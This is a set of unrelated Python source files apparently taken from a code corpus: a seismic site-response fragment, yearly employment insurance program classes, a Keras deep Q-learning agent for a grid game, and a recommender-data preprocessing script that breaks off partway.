elif p['mechanism'] == 'RS':
ln_resp_ref += c.a_9
pga_ref = np.exp(ln_resp_ref[self.INDEX_PGA])
# Compute the nonlinear site term
if p['v_s30'] <= self.V_REF:
vs_ratio = p['v_s30'] / self.V_REF
site = (c.b_1 * np.log(vs_ratio) +
c.b_2 * np.log((pga_ref + c.c * vs_ratio ** c.n) /
((pga_ref + c.c) * vs_ratio ** c.n))
)
else:
site = c.b_1 * np.log(np.minimum(p['v_s30'], c.v_con) / self.V_REF)
self._ln_resp = ln_resp_ref + site
self._ln_std = np.array(c.sd_total)
| 2.46875 | 2 |
srd/ei/programs.py | RogerEMO/srd | 1 | 12786521 | <filename>srd/ei/programs.py
from srd import add_params_as_attr
import os
from srd.ei import template
module_dir = os.path.dirname(os.path.dirname(__file__))
# wrapper to pick correct year
def program(year):
"""
Fonction qui permet de sélectionner le programme par année.
Parameters
----------
year: int
année (présentement entre 2016 et 2020)
Returns
-------
class instance
Une instance de la classe de l'année sélectionnée.
"""
if year == 2016:
p = program_2016()
if year == 2017:
p = program_2017()
if year == 2018:
p = program_2018()
if year == 2019:
p = program_2019()
if year == 2020:
p = program_2020()
return p
# program for 2016, derived from template, only requires modify
# functions that change
class program_2016(template):
"""
Version du programme de 2016.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2016.csv')
# program for 2017, derived from template, only requires modify
# functions that change
class program_2017(template):
"""
Version du programme de 2017.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2017.csv')
# program for 2018, derived from template, only requires modify
# functions that change
class program_2018(template):
"""
Version du programme de 2018.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2018.csv')
# program for 2019, derived from template, only requires modify
# functions that change
class program_2019(template):
"""
Version du programme de 2019.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2019.csv')
# program for 2020, derived from template, only requires modify
# functions that change
class program_2020(template):
"""
Version du programme de 2020.
"""
def __init__(self):
add_params_as_attr(self, module_dir + '/ei/params/parameters_2020.csv')
def compute_benefits_covid(self, p, hh):
"""
Fonction pour calculer les prestations de l'assurance emploi
qui remplaceraient la PCU (contrefactuel).
Parameters
----------
p: Person
instance de la classe Person
hh: Hhold
instance de la classe Hhold
Returns
-------
float
montant de la prestation
"""
months_ei = max(p.months_cerb, p.months_cesb)
if months_ei == 0 or p.prev_inc_work < self.min_inc_work:
return
else:
inc_work_ei = min(self.max_earn_EI, p.prev_inc_work) / self.months_per_year
for month in range(self.begin_april, self.begin_april + months_ei):
if p.hours_month is None or p.hours_month[month] < self.max_hours_month:
clawback = self.claw_rate_low * p.inc_work_month[month]
add_amount = max(0, p.inc_work_month[month]
- self.perc_cutoff_high * inc_work_ei)
clawback += self.claw_rate_high * add_amount
p.inc_ei += max(0, self.rate_benefits * inc_work_ei - clawback)
| 2.65625 | 3 |
Code/BehaviouralModels/DRL.py | Gronne/Individual-Optimization-Based-on-Group-Information-Sharing | 0 | 12786522 | <reponame>Gronne/Individual-Optimization-Based-on-Group-Information-Sharing
import random
import numpy as np
import math
from collections import deque
import time
import os
from tensorflow.keras import models
from tensorflow.keras import layers
from tensorflow.keras import optimizers
from tensorflow.keras import callbacks
import tensorflow
from Simulations.GameFeatures import GameFeatures as GF
from BehaviouralModels.BehaviouralModels import BehaviouralModelInterface
MODEL_NAME = "IndiDQR_1024x2"
MIN_REPLAY_MEMORY_SIZE = 2048
MAX_REPLAY_MEMORY_SIZE = 50_000
MINIBATCH_SIZE = 2048 #Affect how many states it will use to fit
DISCOUNT = 0.99
UPDATE_TARGET_EVERY = 16
MAP_HEIGHT = 14
MAP_WIDTH = 14
class CustomCallback(callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
return
print("Loss: {:7.2f}".format(logs["loss"]))
print("Accuracy: {:7.2f}".format(logs["accuracy"]))
class IndiDRL(BehaviouralModelInterface):
def __init__(self, goals, initial_game_state, feasible_actions, model_addr, results_addr):
super().__init__(goals, initial_game_state, feasible_actions, results_addr)
self._model_addr = model_addr
self._create_directory(self._model_addr)
self._create_model_directory(self._model_addr)
self._mode = None
self._previous_state = None
self._previous_prediction = None
self._previous_score = 0
self._previous_action = None
self._turn_count = 0
if self._get_file_size(self._model_addr + ".txt"):
#Load
self._main_model, self._current_model, self._epsilon = self._load_model()
else:
#Create
#Main model - Get trained every step
self._main_model = self._build_model_conv(initial_game_state, feasible_actions)
#Target model - This is what we predict against every step
self._current_model = self._build_model_conv(initial_game_state, feasible_actions)
self._current_model.set_weights(self._main_model.get_weights())
#Set epsilon
self._epsilon = 1
self._epsilon_decay = 0.99925 #0.99975 before
self._episodes = 6000
self._episode_epsilon = self._epsilon_decay**self._episodes
if self._epsilon < self._episode_epsilon:
self._epsilon = 0
self._target_update_counter = 0
#Ensures that multiple steps can be fitted at once, so it does not overfit to a single one
self._replay_memory = deque(maxlen=MAX_REPLAY_MEMORY_SIZE)
def _create_model_directory(self, addr):
try:
main_dir = addr + "_main_model/"
current_dir = addr + "_current_model/"
os.makedirs(main_dir)
os.makedirs(current_dir)
except FileExistsError:
pass
def get_epsilon(self):
return self._epsilon
def _load_model(self):
print("#####LOAD MODEL#####")
main_model = models.load_model(self._model_addr + "_main_model")
current_model = models.load_model(self._model_addr + "_current_model")
epsilon = None
with open(self._model_addr + ".txt") as model_file:
for line in model_file:
epsilon = float(line)
return main_model, current_model, epsilon
def save_model(self):
self._main_model.save(self._model_addr + "_main_model")
self._current_model.save(self._model_addr + "_current_model")
with open(self._model_addr + ".txt", "w") as file:
file.write(str(self._epsilon))
def _build_model(self, game_state, feasible_actions):
first_layer_size = (len(game_state)) + len(game_state[-1])*3*3 #3 colors in our layers at X pixels + extra info
#Should probably use cnn...
model = models.Sequential()
model.add(tensorflow.keras.Input(shape=(first_layer_size,), name="digits")) #Input layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(len(feasible_actions), activation='linear')) #Output layer
opt = optimizers.Adam(learning_rate=0.0001, decay=1e-6)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
return model
def _build_model_conv(self, game_state, feasible_actions):
inputA = tensorflow.keras.Input(shape=((len(game_state)-2),)) #User info
inputB_1 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - first layer
inputB_2 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - second layer
inputB_3 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - third layer
#-------- InputB_1 --------
#branchB_1 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
#branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
#branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Flatten()(branchB_1)
modelB_1 = models.Model(inputs=inputB_1, outputs=branchB_1)
#-------- InputB_2 --------
#branchB_2 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
#branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
#branchB_2 = layers.Dropout(0.2)(branchB_2)
branchB_2 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
branchB_2 = layers.Dropout(0.2)(branchB_2)
branchB_2 = layers.Flatten()(branchB_2)
modelB_2 = models.Model(inputs=inputB_2, outputs=branchB_2)
#-------- InputB_3 --------
#branchB_3 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
#branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
#branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Flatten()(branchB_3)
modelB_3 = models.Model(inputs=inputB_3, outputs=branchB_3)
#------- Combine -------
branchC = layers.concatenate([inputA, modelB_1.output, modelB_2.output, modelB_3.output])
branchC = layers.Dense(256, activation='relu')(branchC)
branchC = layers.Dense(256, activation='relu')(branchC)
output = layers.Dense(len(feasible_actions), activation='linear')(branchC) #Output layer
model = models.Model(inputs=[inputA, modelB_1.input, modelB_2.input, modelB_3.input], outputs = output)
opt = optimizers.Adam(learning_rate=1e-3)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
#tensorflow.keras.utils.plot_model(model, "multi_input_and_output_model.png", show_shapes=True)
return model
def _custom_loss_function(self, score_true, score_expected):
custom_loss = []
for index, _ in enumerate(score_true):
custom_loss += [math.sqrt((score_true[index]-score_expected[index])**2)]
return np.asarray([custom_loss])
def _update_replay_memory(self, transition):
self._replay_memory.append(transition)
def _get_qs(self, state, step): #Probably not gonna be used
current_state = self._game_to_model_state(state)
prediction = self._main_model.predict(current_state)[0]
return prediction
def _train(self, terminal_state, step):
if len(self._replay_memory) < MIN_REPLAY_MEMORY_SIZE or self._turn_count % 1000 != 0:
return
minibatch = random.sample(self._replay_memory, MINIBATCH_SIZE)
current_state = self._get_current_state(minibatch)
current_qs_list = self._main_model.predict(current_state)
future_state = self._get_future_state(minibatch)
future_qs_list = self._current_model.predict(future_state)
X_info = []
X_l1 = []
X_l2 = []
X_l3 = []
y = []
for index, (current_state, action, reward, new_current_state, done, life_changer) in enumerate(minibatch):
if done:
new_q = -10 #reward
elif life_changer:
new_q = reward
else:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q #The discount is to represent that moves more in the past will have less of an effect on the current result?
current_qs = current_qs_list[index]
current_qs[action] = new_q
self._append_to_input_output_matrices(X_info, X_l1, X_l2, X_l3, y, current_state, current_qs)
X_info_np = self._transform_info_to_np_structure(X_info)
X_l1_np = self._transform_X_to_np_structure(X_l1)
X_l2_np = self._transform_X_to_np_structure(X_l2)
X_l3_np = self._transform_X_to_np_structure(X_l3)
history = self._main_model.fit([X_info_np, X_l1_np, X_l2_np, X_l3_np], np.array(y), batch_size = MINIBATCH_SIZE, verbose = 0, shuffle=False, callbacks=[CustomCallback()] if terminal_state or step%10 == 1 else None) #Only call callback if terminal staste
#Updating to determine if we want to update target_model yet
if terminal_state:
self._target_update_counter += 1
if self._target_update_counter > UPDATE_TARGET_EVERY:
self._target_update_counter = 0
self._current_model.set_weights(self._main_model.get_weights())
def _append_to_input_output_matrices(self, X0, X1, X2, X3, y, state, qs):
X0 += [state[0]] #Previous state
X1 += [state[1]]
X2 += [state[2]]
X3 += [state[3]]
y += [qs] #The score it should have let to
def _transform_info_to_np_structure(self, X_info):
X_info_np = np.array(X_info)
X_info_np = X_info_np.reshape(X_info_np.shape[0], X_info_np.shape[2])
return X_info_np
def _transform_X_to_np_structure(self, X):
X_np = np.array(X)
X_np = X_np.reshape(X_np.shape[0], X_np.shape[2], X_np.shape[3], X_np.shape[4])
return X_np
def _get_current_state(self, minibatch):
current_states_0 = np.array([transition[0][0] for transition in minibatch])
current_states_0 = current_states_0.reshape(current_states_0.shape[0], current_states_0.shape[2])
current_states_1 = np.array([transition[0][1] for transition in minibatch])
current_states_1 = current_states_1.reshape(current_states_1.shape[0], current_states_1.shape[2], current_states_1.shape[3], current_states_1.shape[4])
current_states_2 = np.array([transition[0][2] for transition in minibatch])
current_states_2 = current_states_2.reshape(current_states_2.shape[0], current_states_2.shape[2], current_states_2.shape[3], current_states_2.shape[4])
current_states_3 = np.array([transition[0][3] for transition in minibatch])
current_states_3 = current_states_3.reshape(current_states_3.shape[0], current_states_3.shape[2], current_states_3.shape[3], current_states_3.shape[4])
return [current_states_0, current_states_1, current_states_2, current_states_3]
def _get_future_state(self, minibatch):
new_current_state_0 = np.array([transition[3][0] for transition in minibatch])
new_current_state_0 = new_current_state_0.reshape(new_current_state_0.shape[0], new_current_state_0.shape[2])
new_current_state_1 = np.array([transition[3][1] for transition in minibatch])
new_current_state_1 = new_current_state_1.reshape(new_current_state_1.shape[0], new_current_state_1.shape[2], new_current_state_1.shape[3], new_current_state_1.shape[4])
new_current_state_2 = np.array([transition[3][2] for transition in minibatch])
new_current_state_2 = new_current_state_2.reshape(new_current_state_2.shape[0], new_current_state_2.shape[2], new_current_state_2.shape[3], new_current_state_2.shape[4])
new_current_state_3 = np.array([transition[3][3] for transition in minibatch])
new_current_state_3 = new_current_state_3.reshape(new_current_state_3.shape[0], new_current_state_3.shape[2], new_current_state_3.shape[3], new_current_state_3.shape[4])
return [new_current_state_0, new_current_state_1, new_current_state_2, new_current_state_3]
def action(self, game_state, train_flag = True):
self._turn_count += 1
model_state = self._game_to_model_state(game_state)
if train_flag:
score = self._calculate_score(game_state[0], game_state[2], game_state[3]) - self._previous_score #Reward - Use reqard difference instead
self._previous_score = self._calculate_score(game_state[0], game_state[2], game_state[3])
if self._epsilon > self._episode_epsilon and self._epsilon != 0:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
if self._turn_count % 500 == 0:
self._epsilon *= self._epsilon_decay
print(f"Epsilon: {self._epsilon}, Name: {self._model_addr}")
if isinstance(self._previous_state, list):
terminal_state = game_state[0] == 0 or model_state[0][0][0] != self._previous_state[0][0][0] or model_state[0][0][1] != self._previous_state[0][0][1] #If dead, different health, or different points
self._update_replay_memory((self._previous_state, self._previous_action, score, model_state, game_state[0] == 0, terminal_state)) #Previous state, action taken, score it got, new state it let to, and if it is done (never)
self._train(terminal_state , game_state[0])
else:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
elif not self._turn_count % 100:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
action = self._calculate_action(model_state, 0 if not train_flag or self._epsilon < self._episode_epsilon else self._epsilon)
return action
def _calculate_action(self, current_state, epsilon):
prediction = self._main_model.predict(current_state)
action_index = self._choose_action_from_prediction(prediction, epsilon)
self._previous_state = current_state
self._previous_prediction = prediction
self._previous_action = action_index
return self._feasible_actions[action_index]
def _game_to_model_state(self, game_state):
steps = game_state[0] #Should this be normalized?
life = game_state[1]/100 #Normalize
points = game_state[2] #Should this be normalized?
player_coor = (game_state[3][0]/len(game_state[-1][0]), game_state[3][1]/len(game_state[-1])) #Normalize
model_state_attr = [life, player_coor[0], player_coor[1]]
image_shape = (len(game_state[-1]), len(game_state[-1][0]), len(game_state[-1][0][0][0]))
np_model_state_attr = np.array(model_state_attr).reshape(-1, len(model_state_attr))
np_map = np.array(game_state[-1])
np_model_state_map = np.array([ np_map[:,:,0].reshape(-1, *image_shape)/255,
np_map[:,:,1].reshape(-1, *image_shape)/255,
np_map[:,:,2].reshape(-1, *image_shape)/255 ])
return [np_model_state_attr, np_model_state_map[0], np_model_state_map[1], np_model_state_map[2]]
def _choose_action_from_prediction(self, prediction, epsilon):
prediction = prediction[0]
#Choose the highest score
index = np.argmax(prediction)
if np.random.random() < epsilon:
index = np.random.randint(0, len(prediction))
return index
class GroupDRL(BehaviouralModelInterface):
_replay_memory = deque(maxlen=MAX_REPLAY_MEMORY_SIZE)
_main_model = None
_current_model = None
_global_instances = 0
_global_target_update_count = 0
_global_training_count = 0
_epsilon = 1
def __init__(self, goals, initial_game_state, feasible_actions, model_addr, results_addr):
super().__init__(goals, initial_game_state, feasible_actions, results_addr)
self._model_addr = model_addr
self._main_model_flag = None
if GroupDRL._main_model == None:
self._create_directory(self._model_addr)
self._create_model_directory(self._model_addr)
self._main_model_flag = True
else:
self._main_model_flag = False
self._mode = None
self._previous_state = None
self._previous_prediction = None
self._previous_score = 0
self._previous_action = None
self._turn_count = 0
if self._get_file_size(self._model_addr + ".txt"):
#Load
if GroupDRL._main_model == None:
GroupDRL._main_model, GroupDRL._current_model, GroupDRL._epsilon = self._load_model()
else:
#Create
if GroupDRL._main_model == None:
#Main model - Get trained every step
GroupDRL._main_model = self._build_model_conv(initial_game_state, feasible_actions)
#Target model - This is what we predict against every step
GroupDRL._current_model = self._build_model_conv(initial_game_state, feasible_actions)
GroupDRL._current_model.set_weights(GroupDRL._main_model.get_weights())
#Set epsilon
GroupDRL._epsilon = 1
self._epsilon_decay = 0.99925 #0.99975 before
self._episodes = 6000
self._episode_epsilon = self._epsilon_decay**self._episodes
if GroupDRL._epsilon < self._episode_epsilon:
GroupDRL._epsilon = 0
GroupDRL._global_target_update_count = 0
GroupDRL._global_instances += 1
#Ensures that multiple steps can be fitted at once, so it does not overfit to a single one
GroupDRL._replay_memory = deque(maxlen=MAX_REPLAY_MEMORY_SIZE)
def _create_model_directory(self, addr):
try:
main_dir = addr + "_main_model/"
current_dir = addr + "_current_model/"
os.makedirs(main_dir)
os.makedirs(current_dir)
except FileExistsError:
pass
def get_epsilon(self):
return GroupDRL._epsilon
def _load_model(self):
print("#####LOAD MODEL#####")
main_model = models.load_model(self._model_addr + "_main_model")
current_model = models.load_model(self._model_addr + "_current_model")
epsilon = None
with open(self._model_addr + ".txt") as model_file:
for line in model_file:
epsilon = float(line)
return main_model, current_model, epsilon
def save_model(self):
if self._main_model_flag == True:
GroupDRL._main_model.save(self._model_addr + "_main_model")
GroupDRL._current_model.save(self._model_addr + "_current_model")
with open(self._model_addr + ".txt", "w") as file:
file.write(str(GroupDRL._epsilon))
def _build_model(self, game_state, feasible_actions):
first_layer_size = (len(game_state)) + len(game_state[-1])*3*3 #3 colors in our layers at X pixels + extra info
#Should probably use cnn...
model = models.Sequential()
model.add(tensorflow.keras.Input(shape=(first_layer_size,), name="digits")) #Input layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(1024, activation='relu')) #Hidden layer
model.add(layers.Dense(len(feasible_actions), activation='linear')) #Output layer
opt = optimizers.Adam(learning_rate=0.0001, decay=1e-6)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
return model
def _build_model_conv(self, game_state, feasible_actions):
inputA = tensorflow.keras.Input(shape=((len(game_state)-2),)) #User info
inputB_1 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - first layer
inputB_2 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - second layer
inputB_3 = tensorflow.keras.Input(shape=(len(game_state[-1]), len(game_state[-1][0]), 3)) #Map data - third layer
#-------- InputB_1 --------
#branchB_1 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
#branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
#branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_1) #Convolutional Hidden Layer
branchB_1 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_1)
branchB_1 = layers.Dropout(0.2)(branchB_1)
branchB_1 = layers.Flatten()(branchB_1)
modelB_1 = models.Model(inputs=inputB_1, outputs=branchB_1)
#-------- InputB_2 --------
#branchB_2 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
#branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
#branchB_2 = layers.Dropout(0.2)(branchB_2)
branchB_2 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_2) #Convolutional Hidden Layer
branchB_2 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_2)
branchB_2 = layers.Dropout(0.2)(branchB_2)
branchB_2 = layers.Flatten()(branchB_2)
modelB_2 = models.Model(inputs=inputB_2, outputs=branchB_2)
#-------- InputB_3 --------
#branchB_3 = layers.Conv2D(64, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
#branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
#branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Conv2D(128, (3, 3), activation = 'relu')(inputB_3) #Convolutional Hidden Layer
branchB_3 = layers.MaxPooling2D(pool_size=(2, 2))(branchB_3)
branchB_3 = layers.Dropout(0.2)(branchB_3)
branchB_3 = layers.Flatten()(branchB_3)
modelB_3 = models.Model(inputs=inputB_3, outputs=branchB_3)
#------- Combine -------
branchC = layers.concatenate([inputA, modelB_1.output, modelB_2.output, modelB_3.output])
branchC = layers.Dense(256, activation='relu')(branchC)
branchC = layers.Dense(256, activation='relu')(branchC)
output = layers.Dense(len(feasible_actions), activation='linear')(branchC) #Output layer
model = models.Model(inputs=[inputA, modelB_1.input, modelB_2.input, modelB_3.input], outputs = output)
opt = optimizers.Adam(learning_rate=1e-3)
model.compile(loss="mse",
optimizer=opt,
metrics=['accuracy'])
#tensorflow.keras.utils.plot_model(model, "multi_input_and_output_model.png", show_shapes=True)
return model
def _custom_loss_function(self, score_true, score_expected):
custom_loss = []
for index, _ in enumerate(score_true):
custom_loss += [math.sqrt((score_true[index]-score_expected[index])**2)]
return np.asarray([custom_loss])
def _update_replay_memory(self, transition):
GroupDRL._replay_memory.append(transition)
def _get_qs(self, state, step): #Probably not gonna be used
current_state = self._game_to_model_state(state)
prediction = GroupDRL._main_model.predict(current_state)[0]
return prediction
def _train(self, terminal_state, step):
if len(GroupDRL._replay_memory) < (MIN_REPLAY_MEMORY_SIZE*GroupDRL._global_instances) or GroupDRL._global_training_count % (GroupDRL._global_instances*1000) % 1000 != 0:
return
minibatch = random.sample(GroupDRL._replay_memory, MINIBATCH_SIZE*GroupDRL._global_instances)
current_state = self._get_current_state(minibatch)
current_qs_list = GroupDRL._main_model.predict(current_state)
future_state = self._get_future_state(minibatch)
future_qs_list = GroupDRL._current_model.predict(future_state)
X_info = []
X_l1 = []
X_l2 = []
X_l3 = []
y = []
for index, (current_state, action, reward, new_current_state, done, life_changer) in enumerate(minibatch):
if done:
new_q = -10 #reward
elif life_changer:
new_q = reward
else:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q #The discount is to represent that moves more in the past will have less of an effect on the current result?
current_qs = current_qs_list[index]
current_qs[action] = new_q
self._append_to_input_output_matrices(X_info, X_l1, X_l2, X_l3, y, current_state, current_qs)
X_info_np = self._transform_info_to_np_structure(X_info)
X_l1_np = self._transform_X_to_np_structure(X_l1)
X_l2_np = self._transform_X_to_np_structure(X_l2)
X_l3_np = self._transform_X_to_np_structure(X_l3)
history = GroupDRL._main_model.fit([X_info_np, X_l1_np, X_l2_np, X_l3_np], np.array(y), batch_size = MINIBATCH_SIZE, verbose = 0, shuffle=False, callbacks=[CustomCallback()] if terminal_state or step%10 == 1 else None) #Only call callback if terminal staste
#Updating to determine if we want to update target_model yet
if terminal_state:
GroupDRL._global_target_update_count += 1
if GroupDRL._global_target_update_count > UPDATE_TARGET_EVERY:
GroupDRL._global_target_update_count = 0
GroupDRL._current_model.set_weights(GroupDRL._main_model.get_weights())
def _append_to_input_output_matrices(self, X0, X1, X2, X3, y, state, qs):
X0 += [state[0]] #Previous state
X1 += [state[1]]
X2 += [state[2]]
X3 += [state[3]]
y += [qs] #The score it should have let to
def _transform_info_to_np_structure(self, X_info):
X_info_np = np.array(X_info)
X_info_np = X_info_np.reshape(X_info_np.shape[0], X_info_np.shape[2])
return X_info_np
def _transform_X_to_np_structure(self, X):
X_np = np.array(X)
X_np = X_np.reshape(X_np.shape[0], X_np.shape[2], X_np.shape[3], X_np.shape[4])
return X_np
def _get_current_state(self, minibatch):
current_states_0 = np.array([transition[0][0] for transition in minibatch])
current_states_0 = current_states_0.reshape(current_states_0.shape[0], current_states_0.shape[2])
current_states_1 = np.array([transition[0][1] for transition in minibatch])
current_states_1 = current_states_1.reshape(current_states_1.shape[0], current_states_1.shape[2], current_states_1.shape[3], current_states_1.shape[4])
current_states_2 = np.array([transition[0][2] for transition in minibatch])
current_states_2 = current_states_2.reshape(current_states_2.shape[0], current_states_2.shape[2], current_states_2.shape[3], current_states_2.shape[4])
current_states_3 = np.array([transition[0][3] for transition in minibatch])
current_states_3 = current_states_3.reshape(current_states_3.shape[0], current_states_3.shape[2], current_states_3.shape[3], current_states_3.shape[4])
return [current_states_0, current_states_1, current_states_2, current_states_3]
def _get_future_state(self, minibatch):
new_current_state_0 = np.array([transition[3][0] for transition in minibatch])
new_current_state_0 = new_current_state_0.reshape(new_current_state_0.shape[0], new_current_state_0.shape[2])
new_current_state_1 = np.array([transition[3][1] for transition in minibatch])
new_current_state_1 = new_current_state_1.reshape(new_current_state_1.shape[0], new_current_state_1.shape[2], new_current_state_1.shape[3], new_current_state_1.shape[4])
new_current_state_2 = np.array([transition[3][2] for transition in minibatch])
new_current_state_2 = new_current_state_2.reshape(new_current_state_2.shape[0], new_current_state_2.shape[2], new_current_state_2.shape[3], new_current_state_2.shape[4])
new_current_state_3 = np.array([transition[3][3] for transition in minibatch])
new_current_state_3 = new_current_state_3.reshape(new_current_state_3.shape[0], new_current_state_3.shape[2], new_current_state_3.shape[3], new_current_state_3.shape[4])
return [new_current_state_0, new_current_state_1, new_current_state_2, new_current_state_3]
def action(self, game_state, train_flag = True):
self._turn_count += 1
GroupDRL._global_training_count += 1
model_state = self._game_to_model_state(game_state)
if train_flag:
score = self._calculate_score(game_state[0], game_state[2], game_state[3]) - self._previous_score #Reward - Use reqard difference instead
self._previous_score = self._calculate_score(game_state[0], game_state[2], game_state[3])
if GroupDRL._epsilon > self._episode_epsilon and GroupDRL._epsilon != 0:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
if self._turn_count % 500 == 0:
GroupDRL._epsilon *= self._epsilon_decay
print(f"Epsilon: {GroupDRL._epsilon}, Name: {self._model_addr}")
if isinstance(self._previous_state, list):
terminal_state = game_state[0] == 0 or model_state[0][0][0] != self._previous_state[0][0][0] or model_state[0][0][1] != self._previous_state[0][0][1] #If dead, different health, or different points
self._update_replay_memory((self._previous_state, self._previous_action, score, model_state, game_state[0] == 0, terminal_state)) #Previous state, action taken, score it got, new state it let to, and if it is done (never)
self._train(terminal_state , game_state[0])
else:
if self._turn_count % 100 == 0:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
elif not self._turn_count % 100:
print(f"Train: {train_flag}, steps: {self._turn_count}, life: {game_state[1]}, points: {game_state[2]}, score: {self._previous_score}, Name: {self._model_addr}")
action = self._calculate_action(model_state, 0 if not train_flag or GroupDRL._epsilon < self._episode_epsilon else GroupDRL._epsilon)
return action
def _calculate_action(self, current_state, epsilon):
prediction = GroupDRL._main_model.predict(current_state)
action_index = self._choose_action_from_prediction(prediction, epsilon)
self._previous_state = current_state
self._previous_prediction = prediction
self._previous_action = action_index
return self._feasible_actions[action_index]
def _game_to_model_state(self, game_state):
steps = game_state[0] #Should this be normalized?
life = game_state[1]/100 #Normalize
points = game_state[2] #Should this be normalized?
player_coor = (game_state[3][0]/len(game_state[-1][0]), game_state[3][1]/len(game_state[-1])) #Normalize
model_state_attr = [life, player_coor[0], player_coor[1]]
image_shape = (len(game_state[-1]), len(game_state[-1][0]), len(game_state[-1][0][0][0]))
np_model_state_attr = np.array(model_state_attr).reshape(-1, len(model_state_attr))
np_map = np.array(game_state[-1])
np_model_state_map = np.array([ np_map[:,:,0].reshape(-1, *image_shape)/255,
np_map[:,:,1].reshape(-1, *image_shape)/255,
np_map[:,:,2].reshape(-1, *image_shape)/255 ])
return [np_model_state_attr, np_model_state_map[0], np_model_state_map[1], np_model_state_map[2]]
def _choose_action_from_prediction(self, prediction, epsilon):
prediction = prediction[0]
#Choose the highest score
index = np.argmax(prediction)
if np.random.random() < epsilon:
index = np.random.randint(0, len(prediction))
return index | 2.203125 | 2 |
benchmark/config.py | babylonhealth/multiverse | 12 | 12786523 |
MULTIVERSE_NUM_CORES_TO_USE = 1
| 1.023438 | 1 |
preprocess.py | noveens/sampling_cf | 6 | 12786524 | from initial_data_prep_code import movielens, amazon, goodreads, beeradvocate
from data_path_constants import get_data_path
from svp_handler import SVPHandler
percent_sample = [ 20, 40, 60, 80, 90, 99 ]
# Which datasets to prep?
for dataset in [
'magazine',
'ml-100k',
## Did not download & preprocess the following in
## the included code, but feel free to download and uncomment
# 'luxury',
# 'video_games',
# 'beeradvocate',
# 'goodreads_comics',
]:
print("\n\n\n!!!!!!!! STARTED PROCESSING {} !!!!!!!!\n\n\n".format(dataset))
if dataset in [ 'ml-100k' ]: total_data = movielens.prep(dataset)
elif dataset in [ 'luxury', 'magazine', 'video_games' ]: total_data = amazon.prep(dataset)
elif dataset in [ 'goodreads_comics' ]: total_data = goodreads.prep(dataset)
elif dataset in [ 'beeradvocate' ]: total_data = beeradvocate.prep(dataset)
# Store original data
total_data.save_data(get_data_path(dataset))
# Sampling
for train_test_split in [ '20_percent_hist', 'leave_2' ]:
total_data.complete_data_stats = None # Since task changed
path_uptil_now = get_data_path(dataset) + "/" + train_test_split + "/"
# Make full-data (No sampling)
total_data.train_test_split(train_test_split)
print("\n{} split, Overall:".format(train_test_split))
